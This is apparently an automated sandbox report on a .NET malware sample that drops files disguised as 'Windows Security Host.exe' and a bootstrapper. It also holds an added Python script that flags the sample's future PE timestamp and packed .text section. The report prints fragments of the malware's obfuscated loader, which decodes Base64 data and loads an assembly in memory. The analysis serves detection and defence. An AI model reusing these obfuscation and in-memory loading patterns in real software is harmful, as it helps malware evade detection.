Source: Binary string: mscorlib.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Core.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Runtime.Serialization.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Numerics.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.ni.pdb source: WERAD5E.tmp.dmp.23.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERAD5E.tmp.dmp.23.dr

Data Obfuscation

Source: Windows Security Host.exe.0.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.OuTzUhPYtQqV287zCSf0oVRih6gVPh8dMzqj2YPHCCs30iBp6blvsuW,ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.upIt1fwS9dmgmXHFhU7Ktmq2wkUFxs4SI1JyhpSVjAOEZcBeuqRaA5y,ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.KTnoemogtnEz2jQ7erkMbtpLWeNUmE0SXg06ljkJTxmOqFPjq2H9MFs,ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.lHAQl6jDawA7sDZRqxByd8jBL8pdvhp0haGqY8Ts1FdeyfyO0gQSMt7,Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.hOKIC7FK9Rajll6qRjm4KBCtWlHS4LBvgvoxxUIi()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Windows Security Host.exe.0.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{VMTTl7RVt1OdSxAUEJ6qsFdPzuSPsiOgvudMUIz5[2],Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.UvFO9NG9AJ96qUxZ3W7wxprFYsilLQNz5X0oXOTV(Convert.FromBase64String(VMTTl7RVt1OdSxAUEJ6qsFdPzuSPsiOgvudMUIz5[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.OuTzUhPYtQqV287zCSf0oVRih6gVPh8dMzqj2YPHCCs30iBp6blvsuW,ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.upIt1fwS9dmgmXHFhU7Ktmq2wkUFxs4SI1JyhpSVjAOEZcBeuqRaA5y,ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.KTnoemogtnEz2jQ7erkMbtpLWeNUmE0SXg06ljkJTxmOqFPjq2H9MFs,ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.lHAQl6jDawA7sDZRqxByd8jBL8pdvhp0haGqY8Ts1FdeyfyO0gQSMt7,Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.hOKIC7FK9Rajll6qRjm4KBCtWlHS4LBvgvoxxUIi()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{VMTTl7RVt1OdSxAUEJ6qsFdPzuSPsiOgvudMUIz5[2],Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.UvFO9NG9AJ96qUxZ3W7wxprFYsilLQNz5X0oXOTV(Convert.FromBase64String(VMTTl7RVt1OdSxAUEJ6qsFdPzuSPsiOgvudMUIz5[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Windows Security Host.exe.3.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.OuTzUhPYtQqV287zCSf0oVRih6gVPh8dMzqj2YPHCCs30iBp6blvsuW,ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.upIt1fwS9dmgmXHFhU7Ktmq2wkUFxs4SI1JyhpSVjAOEZcBeuqRaA5y,ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.KTnoemogtnEz2jQ7erkMbtpLWeNUmE0SXg06ljkJTxmOqFPjq2H9MFs,ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.lHAQl6jDawA7sDZRqxByd8jBL8pdvhp0haGqY8Ts1FdeyfyO0gQSMt7,Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.hOKIC7FK9Rajll6qRjm4KBCtWlHS4LBvgvoxxUIi()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Windows Security Host.exe.3.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{VMTTl7RVt1OdSxAUEJ6qsFdPzuSPsiOgvudMUIz5[2],Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.UvFO9NG9AJ96qUxZ3W7wxprFYsilLQNz5X0oXOTV(Convert.FromBase64String(VMTTl7RVt1OdSxAUEJ6qsFdPzuSPsiOgvudMUIz5[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Windows Security Host.exe.0.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs | .Net Code: U0Gv4nHYZqCA7eR70Vg6BjcM2X9skZ7l4GfQZI36T7V7aENt5AQ1hjS System.AppDomain.Load(byte[])
Source: Windows Security Host.exe.0.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs | .Net Code: UbC6S8BZSFB6tNxgzNPrP0phxzq5fnd2qtOeiFu3 System.AppDomain.Load(byte[])
Source: Windows Security Host.exe.0.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs | .Net Code: UbC6S8BZSFB6tNxgzNPrP0phxzq5fnd2qtOeiFu3
Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs | .Net Code: U0Gv4nHYZqCA7eR70Vg6BjcM2X9skZ7l4GfQZI36T7V7aENt5AQ1hjS System.AppDomain.Load(byte[])
Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs | .Net Code: UbC6S8BZSFB6tNxgzNPrP0phxzq5fnd2qtOeiFu3 System.AppDomain.Load(byte[])
Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs | .Net Code: UbC6S8BZSFB6tNxgzNPrP0phxzq5fnd2qtOeiFu3
Source: Windows Security Host.exe.3.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs | .Net Code: U0Gv4nHYZqCA7eR70Vg6BjcM2X9skZ7l4GfQZI36T7V7aENt5AQ1hjS System.AppDomain.Load(byte[])
Source: Windows Security Host.exe.3.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs | .Net Code: UbC6S8BZSFB6tNxgzNPrP0phxzq5fnd2qtOeiFu3 System.AppDomain.Load(byte[])
Source: Windows Security Host.exe.3.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs | .Net Code: UbC6S8BZSFB6tNxgzNPrP0phxzq5fnd2qtOeiFu3
                    Source: Injector.exe.0.drStatic PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe Code function: 0_2_00007FFAAC5B00BD pushad ; iretd 0_2_00007FFAAC5B00C1
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exe Code function: 2_2_00007FFAAC5800BD pushad ; iretd 2_2_00007FFAAC5800C1
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe Code function: 3_2_00007FFAAC5A593C push esp; retf 3_2_00007FFAAC5A59D9
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Code function: 4_2_00007FFAAC5AD668 push ss; retf 4_2_00007FFAAC5AD837
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Code function: 4_2_00007FFAAC5900BD pushad ; iretd 4_2_00007FFAAC5900C1
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Code function: 4_2_00007FFAAC5AA272 push ebx; retf 4_2_00007FFAAC5AA282
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFAAC46D2A5 pushad ; iretd 16_2_00007FFAAC46D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFAAC652316 push 8B485F94h; iretd 16_2_00007FFAAC65231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFAAC656053 pushad ; iretd 16_2_00007FFAAC6561B1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_00007FFAAC46D2A5 pushad ; iretd 24_2_00007FFAAC46D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_00007FFAAC5811DD push E95C6805h; ret 24_2_00007FFAAC581239
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_00007FFAAC652316 push 8B485F94h; iretd 24_2_00007FFAAC65231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_00007FFAAC46D2A5 pushad ; iretd 28_2_00007FFAAC46D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 28_2_00007FFAAC652316 push 8B485F94h; iretd 28_2_00007FFAAC65231B
                    Source: 8Hd0ZExgJz.exe Static PE information: section name: .text entropy: 7.99421164591081
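The two static indicators above (a COFF TimeDateStamp of 0x9C61056C that decodes to 2053, and a .text section with entropy 7.994 out of a possible 8.0) can be reproduced with a few lines of header parsing. The following is an added example, not Joe Sandbox code and not taken from the sample: it walks the PE header with the standard library only, converts the timestamp, computes Shannon entropy per section, and flags both conditions. The 7.2 entropy cut-off, the 2024-11-12 analysis date and the constructed test image are assumptions of the example; the timestamp value is the one the report lists for Injector.exe.

```python
"""Checks for the two static-PE indicators listed above: a COFF TimeDateStamp that
cannot be a real build time and a .text section with near-maximal entropy.
Added example (not Joe Sandbox code); standard library only."""
import math
import struct
from collections import Counter
from datetime import datetime, timezone
from typing import Dict, List, Optional, Tuple

PE_SIGNATURE = b"PE\0\0"
ENTROPY_THRESHOLD = 7.2  # assumed cut-off; plain x64 code usually sits between ~5.5 and ~6.8


def shannon_entropy(data: bytes) -> float:
    """Bits per byte in [0.0, 8.0]; compressed or encrypted payloads approach 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_timestamp_utc(stamp: int) -> datetime:
    """IMAGE_FILE_HEADER.TimeDateStamp is a 32-bit count of seconds since 1970-01-01 UTC."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def parse_pe(image: bytes) -> Tuple[datetime, Dict[str, float]]:
    """Minimal PE walk: returns (compile timestamp, {section name: entropy})."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER (20 bytes): Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    table = coff + 20 + opt_size
    sections: Dict[str, float] = {}
    for i in range(nsections):
        # IMAGE_SECTION_HEADER is 40 bytes; only the first five fields are needed here
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, table + 40 * i)
        label = name.rstrip(b"\0").decode("ascii", "replace")
        sections[label] = shannon_entropy(image[raw_ptr:raw_ptr + raw_size])
    return pe_timestamp_utc(stamp), sections


def triage(image: bytes, now: Optional[datetime] = None) -> List[str]:
    """Findings in the style of the report lines: future timestamp, packed sections."""
    now = now or datetime.now(timezone.utc)
    stamp, sections = parse_pe(image)
    findings = []
    if stamp > now:
        findings.append(f"TimeDateStamp {stamp:%Y-%m-%d %H:%M:%S} UTC lies in the future")
    for label, h in sections.items():
        if h >= ENTROPY_THRESHOLD:
            findings.append(f"section {label} entropy {h:.3f} (packed or encrypted)")
    return findings


def build_sample_pe(stamp: int, sections: List[Tuple[bytes, bytes]]) -> bytes:
    """Construct a header-only PE image for testing (constructed data, not the real sample)."""
    e_lfanew, opt_size, align = 0x40, 0xF0, 0x200  # PE32+ optional header size, 512-byte file alignment
    header_len = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    ptr = -(-header_len // align) * align  # first raw section offset, rounded up to alignment
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), stamp, 0, 0, opt_size, 0x22)
    table, body = b"", b""
    for name, data in sections:
        raw_size = -(-len(data) // align) * align
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), 0x1000,
                             raw_size, ptr, 0, 0, 0, 0, 0x60000020)
        body += data.ljust(raw_size, b"\0")
        ptr += raw_size
    image = dos + PE_SIGNATURE + coff + b"\0" * opt_size + table
    return image.ljust(-(-header_len // align) * align, b"\0") + body


def demo() -> List[str]:
    """Reproduce both findings on constructed data: the report's own timestamp 0x9C61056C
    and a .text section of maximal entropy (every byte value appearing 16 times)."""
    image = build_sample_pe(0x9C61056C, [(b".text", bytes(range(256)) * 16), (b".rdata", b"\0" * 512)])
    analysis_time = datetime(2024, 11, 12, tzinfo=timezone.utc)  # assumed analysis date
    return triage(image, now=analysis_time)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

On the constructed image, `demo()` reports the 2053 timestamp and the 8.000-entropy .text section and stays silent on the zero-filled .rdata, which is the same pair of findings the report lists for Injector.exe and 8Hd0ZExgJz.exe. Against a real dropped file, read the bytes from disk and call `triage()` directly; a .text entropy above roughly 7.2 on a .NET binary is a strong sign that the visible assembly is only a loader for an encrypted payload, consistent with the `System.AppDomain.Load(byte[])` call listed above.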
                    Source: Windows Security Host.exe.0.dr, Hack4BQFI25fjaBNRAgg7o1cJuSJYApNkWzwGV1K.csHigh entropy of concatenated method names: 'fUaHi915Q2SCY4vatUCg5JS73gHa4SRSgz9a4Iph', 'ym11NVLutZRyymekaMkNX6RXHRAEwMZaVle9qIEr', 'DsGK73xG4SufqS3g4FJRUb8ujF0JLOI4Dy82fG4x', 'mqs8mPuBqHXiB7zQHUi2mNoZy8vJqGHkUT0CmSHNi2NnvMRzxssrCqjm8VaeO5q7r0msTw6UTlXCCGAINkhGOAqopO', 'YEAij0svkgkGFvxSR8j0NLfx0o39uOHnoEwzTHav9LLlRLUr0unxNElOo5zVZKEnm7LMx08owypsnt4osoh1hi2aeO', 'IhB9suP04ABwxnKjapODuJlTZGintCvMvus8eEUpKsNPBrvoRVqMYkdLBqIdo8sufoIlqif6DPalwIalps9higKuqL', 'rRRL1Tzs76hOBNZZE9J8OyN191KlX2Zua4qHcRurl3rYxw9qQj3dQJVLLOCfHqdJIHSyBgsDUoyFcaeOFrVAdhTcPa', '_2krxW3K1nVwn1psV5pxeR5rOzAM1FYYQ8WYOgznQ3vGMf8pLAxDlTCP8lMlm2BELLsWbUsRgtQxHQngLOtPrLZegt1', 'He0a2h4bt1MEb6K6iOiOpT4n4iGzhSJOYP9R8klgc5LsFcDNY4tJyT6Jsj6nbUaMNLollDYIBTB7dv6e7PIKIkM5fe', 'rwmklMnQjcQRsAVWs6gm4avIaROxOY0jJbUqWJlRuMET7qNlviyrNJFUnTL1zXchptI6S1qBCuU91jVZWVcdL1kUVw'
                    Source: Windows Security Host.exe.0.dr, ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.csHigh entropy of concatenated method names: 'MN8ERM3Z7FBRl3Zg8JQhw3aqRsEPhqVkQNTiletuPm9KE9HuFTUNm8ftCO8OB3ufO7FEUZnJ', 'o36wxU1HlWqf5SgBFVDXAxjVdkkWAvnnFpE2ycR3WIkH0GVFAGV3YGURabPwFHo80TIQhGqK', 'PoCuA8O3oyIuHQMZKDDvNEyGf7s2iu8bvCMn6F9NvnAIAYjgvZ2E5tgMknmEqueR4vcD5w0k', 'f2ee6ydpQQMb1mqxGTd9yqXKOhq7lwXE6csu2Ly07TH43DhnUryiDmV2J9PlJdfNxN7JAjbR'
                    Source: Windows Security Host.exe.0.dr, hwmtv4f3DiHFPVZouaTyX8hlf0YqgEyb8O6Ad4mWdDWf1F52iddDM7M.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'XRSbeAtfgYh7Kxptedlsp8xqd7xGLTHWVMdpVwoC1pBfTNxGkjcdApxcOkNqSvCf0ZVjXcW4', '_4OxmFCSdwAhhRFUy08Hfrto0pBgjFdzmrMnOcS1EtaRsrUWzWVzeWb8Sbf0Rteu0mY2ckHiT', '_2VHg99hYV8ztmyyHua3f3n1NHwtunTTvPf5tQtiijBKEyDfnRFevJg1NyhW12dkwY0SAEs1H', 'hNl93BgmIFdzfAPlUMFzRiK1L0ZFMkdjwYLlBAd8Bl3eOfkqDuoYeIAClwUy3EajsREUqzXx'
                    Source: Windows Security Host.exe.0.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.csHigh entropy of concatenated method names: 'Rm8FpaieZMoW7z264rwb8bz2H4c6aHp7Zm9YjgtPENyjw36t3xrA1TG', 'U0Gv4nHYZqCA7eR70Vg6BjcM2X9skZ7l4GfQZI36T7V7aENt5AQ1hjS', 'ACAK89aZu2VzBZzFwLe5rT07V13pTwQX1KvSun2hM7yPr4VggBMTLHW', 'r2Frn0E0r7vvmo5i6oVO7doevY9d2pMj5XxfKdJPBB87BDFwDCpH3HB', 'DLhjX4mF0CaPUxa2ro80Inw17SJhzceCWBzhzO0XvNPOnlBEAXjNxbF', 'W5YqEwH4kesxhRqTE8cNqHwkdORdaiyXAGJpGFKqyrlINzkwUs4j7oC', 'Wz7IZYizEXhCHMcepDfJNxEUHgICm0GABfdMcPCVBKUH1I6omKhG6wb', 'XtDzhljwkL9BW8rl2Twvx5I3CNX2p2q5XHUZSmKXVC9gsPyoDUnjPjD', 'zw3YUhNglyha13YdAfNFYNIlLApZXat23upzIHyaJ66NXiIaRSfc7tn', 'OA2Y2mutcuZCMyuD3JXI0NbB0SqNdFEr2zmRRkam'
                    Source: Windows Security Host.exe.0.dr, Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.csHigh entropy of concatenated method names: 'nMqyhawtoA24xIuxIlptmwHWKsfTnFGLPZYUqdN9', 'dkKJ2Ath9TgOHMiUghO6R4hPmK8Xw5fmDoyNV5P7', 'BPpR7Ihy5fuOMuoqs7TQjosfgUVIZ22jYpx9bPHG', 'LXUSQL8p3GARl1t1DUhLmf0RYQlxGggBkC5PbzpP', 'mibSVfQ5vcknf04M1C1usZuxFTDSyiZfp2N24mpl', '_4oD51RdiUFYtMo1halOtlbwbXPb6uBBoeS5ypGsR', 'rpl1WfPD4F66gyyTij9oLXwcuDh7jputgu2gpVmI', 'vKUNX0ELXQW2QGnW9wpnTvdnaS9fHwA0A6zv7Svf', 'ib2jtjbB3jlpY3YH7Tg8jBzi0CnlnQlDfHHaUDeO', 'JURZnwyOMeCJOjZP1CcqQ4r4zObCsDNqiKp4oYEB'
                    Source: Windows Security Host.exe.0.dr, pCU0BaPayj3nEJTRG1YX7L1Jb5gOxsx4ZxeKDKGJ.csHigh entropy of concatenated method names: 'gwdBiDGrsqra4xJDEVRAAHk8ixWQMtISqaOJ0eCA', 'o3HWCRkvMkpvSZB20yl1pF7FU8wPRHVFnGESfuPNUY9JXs6BXOmzmhy9s', 'qMmdryJ92VOoGpffxkNicZMZIa7I4Itnx1MnCozVhSTnHOlt9MXB60dCL', 'Pz6T4a3ONk9BHptTHm0ebvVVwUVX51tvvdrSLqRUg5nfFo0e3KJGdVTEQ', 'X743L84zyetr9mkRrCNo6pI1vOOCPya9yVGOKeEwJPc9RaOQskAzT0mCZ'
                    Source: Windows Security Host.exe.0.dr, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.csHigh entropy of concatenated method names: 'TPKhuDz4s1rf8i1hwqc2QMGg2UsV554vOm7i1AZ3KylU9pSjoUm05dL', 'cRhOtQfLozT80pWem0pirZy7pbnycZ3QwlB4JpKR1vCz51OSpkaOaTW', 'AJaac4JmemH2rsVa7lRrDmlnr2JC8lkgHeZGLSuU3cBilefGFbLeyOm', 'V7pa2Sc0gIB6xlLp8hlR185xs6zHDAgeTucJr9PGvASsfB0UEey6Oq6', 'Yr9oFPBU6ubOrG5zzpzNARhs7OSfaSkoOG6l3NRsMK8HYxu8S3QtIUB', 'ZUZzZaytAPji40S1dtCDVgZ0LcSJ0j27gVA1ZGtttHycnaf3zFzt2h7', 'GUnAuukad8VQsTQYfnD6x6Fpwvm7mkL8WPXhduRX348d0ZpldeYzDQ5', '_7c85FFD3oacggbQwxP2IM8lsbcjqrI9rjMGlWFrFpqhX72fwmFR8lBj', 'j4MedkzxJYMH1i3xVxph16gRvdEfFMyqJ3M4sqCgCg7Og7sp6f8wJc1', 'irUSf4pIDk7ubW7NNL4w6RiLKDzrDHEtkBSnsaggCZFS8x4uRM5dBye'
                    Source: Windows Security Host.exe.0.dr, pX49WTWreP6h38vcWNF06rYOS0B7DTfD16dfY5IqI76SjlXgINh7OKF.csHigh entropy of concatenated method names: 'UWl6q1tllqEQvYndtdinpjTk8r0RWn1697idwuzTDx6BhexflmYJ2dU', 'l3UqPE30ijk1rA7iiMlD6uHMWW44RKAn0GsYYXfoonm2RKO0N96BFbo', 'rJCMhP4h7Og0wKAV85o7J39PyMu66yeQtbJb5iPLftfXOFJloVQxw6H', 'ox1KIzQ8N3KwianZxJ388IvIKMZKyRdf5Rq2Axm7YHgsn5XIMVK2H1O', 'oz94QYmoZ1n9yrPPxv4DH4biNmUSZwT51KY7Cwzg7EOTtZtzFSEABUW', 'tNoOd4KzCCvrj98IsqK5cgzZEvh7aF66nLyJpo32UhQqHuJso4KE3GGCWhCmI130ZF5wlTS4', 'DMiNRlVGn3v8eBi2x05rnJ6NPDNYXx1gaX7XvR4RDwQbWac9JTNyzMBGGTuieEbjfS0cx8Zh', 'huqcnufBpqYs9kQ4UnseK72wuRhbEmSCXYwQtqwjN4CFhD4ZqfFUmPTk8wzYP3MmBEFFop9K', '_2DYmVyFxTcStEhswOvIoIAImlrjVqo4OHwf7uXdTlwY45VVg8urKvP0QAjLbjlG3FhgLPyC4', 'bJ49487JZH0h3KuPyE7nCxT3wiTZxYEVNGGjelqZDWkJCXgs5nCw64cNFunmDuWInLRxxhFA'
                    Source: Windows Security Host.exe.0.dr, mzsbakNglaER3LKxVTydaTROCw6IGp8wfTPLVmdZ.csHigh entropy of concatenated method names: 'Q1lY74VbQ4HPiyjyEy8FkRqehrkKk9b02JKt5mfN', 'bjuyZK2t7i6FCrci4IwFKhprso6J4s1zinnbj9mYeCcfkTnSW6lL9OBJR', '_1BVyv1KlKzatjWbnYHz6oSSHvfDumsLHrOeA4wdiX5kAoOpa6tiIk0f3Q', 'cc4awgwWvVPvUALiJ7wJntzSlbcGWn3JeD1U77MUVERXgdn5mZgfNMSYP', 'vdqcUf0ULR2Ql9ijYKvl9Dqxxn62pYGqiXiTnNwqv2MP5cQGZugtxBNyP'
                    Source: Windows Security Host.exe.0.dr, GWYxCOLqDOSWCLC3OG7xybolFnfHf1CzbiM9fHDC.csHigh entropy of concatenated method names: '_2wMZuA6jmIytnkRIwWH0lqZw7LIBE9V3QHKp7Mke', 'bd8gO9tsieaFCGyalOw8vq0qhCXtNoHnshRbKDNQ', 'z7AzFkomS0LUj194z315YdBWwnjNzXoCAWSsrKfb', 'DIljgHyfeWUsj6TlEPYK1rADoYqAPfp1ZiBx9HOk', '_6mWR3tOHUygNZihtjS3S3Y0AkQygbkfGmos0PN2c', 'og8OXj7OIhc5FtcOPCJPieYQH4Fg18CiEb7Qgs5s', 'P5CEoPF5i0mWht3ttKY5FZaUtf6YC5f8okAqJrl3', 'DPMnVeYYzbsm4w0rOUrg2fiB5DAumi1Yq4ZnU0Tw', 'l16dhBsaRlPGiO5OYXn5CCcZWDk9C5T1yX4StPCZ', 'CClexRkZSfofMTN5sD2jl4C80ZQ4BvQ31hs5CROF'
                    Source: Windows Security Host.exe.0.dr, kGWyFLzwGo1x3FHf7gkFoqhjADWohiyUpAlG1Wdv.csHigh entropy of concatenated method names: 'eKDrezHiHFH4nDVWsJUkqDakojPPfGvRSIeoCGAu', 'RGpeD9ZyFVNo3DGQc0iu6XnZ5qm2hqJguEsGnRrU', 'ZrvakkhboWtWhTPIKnioCkXAWPPppxTdt5LmV8Xw', 'FeKYJSRu8xpJDE6vqKDJLUnDs7LaQvo0IL8LKXOb', 'VHn7mZvZGguiJQgUtk3ERNVEKjevviaOJO9fiLBuVsZihRyDOUoh1T4Fr', 'PzIi4HCZWxkpY13cUeNCFhCwrlFPJFIA3PgzUe8KICDXUqU6LkXadCG3Q', 'IbdnY17WXJp3tISDz1bmw18R2nhAY4N01GyYv75arjSliz7OV64HohZIb', '_5BUa1nZHKmRvfOV6AJM1UamikedsjY8MJGGaeBkcNpM0nGugS035IU2IL', 's1PVejoGdKHkRMGHi2Q9ERoME74Op1LuTFSI3eP8ZgIob5ccdW7TxrQrn', 'KLbXMDx9NTK4Z0wyHTmJGa45lihRyIJsY02l2JocyAOwDWifSoNpamqkT'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, Hack4BQFI25fjaBNRAgg7o1cJuSJYApNkWzwGV1K.csHigh entropy of concatenated method names: 'fUaHi915Q2SCY4vatUCg5JS73gHa4SRSgz9a4Iph', 'ym11NVLutZRyymekaMkNX6RXHRAEwMZaVle9qIEr', 'DsGK73xG4SufqS3g4FJRUb8ujF0JLOI4Dy82fG4x', 'mqs8mPuBqHXiB7zQHUi2mNoZy8vJqGHkUT0CmSHNi2NnvMRzxssrCqjm8VaeO5q7r0msTw6UTlXCCGAINkhGOAqopO', 'YEAij0svkgkGFvxSR8j0NLfx0o39uOHnoEwzTHav9LLlRLUr0unxNElOo5zVZKEnm7LMx08owypsnt4osoh1hi2aeO', 'IhB9suP04ABwxnKjapODuJlTZGintCvMvus8eEUpKsNPBrvoRVqMYkdLBqIdo8sufoIlqif6DPalwIalps9higKuqL', 'rRRL1Tzs76hOBNZZE9J8OyN191KlX2Zua4qHcRurl3rYxw9qQj3dQJVLLOCfHqdJIHSyBgsDUoyFcaeOFrVAdhTcPa', '_2krxW3K1nVwn1psV5pxeR5rOzAM1FYYQ8WYOgznQ3vGMf8pLAxDlTCP8lMlm2BELLsWbUsRgtQxHQngLOtPrLZegt1', 'He0a2h4bt1MEb6K6iOiOpT4n4iGzhSJOYP9R8klgc5LsFcDNY4tJyT6Jsj6nbUaMNLollDYIBTB7dv6e7PIKIkM5fe', 'rwmklMnQjcQRsAVWs6gm4avIaROxOY0jJbUqWJlRuMET7qNlviyrNJFUnTL1zXchptI6S1qBCuU91jVZWVcdL1kUVw'
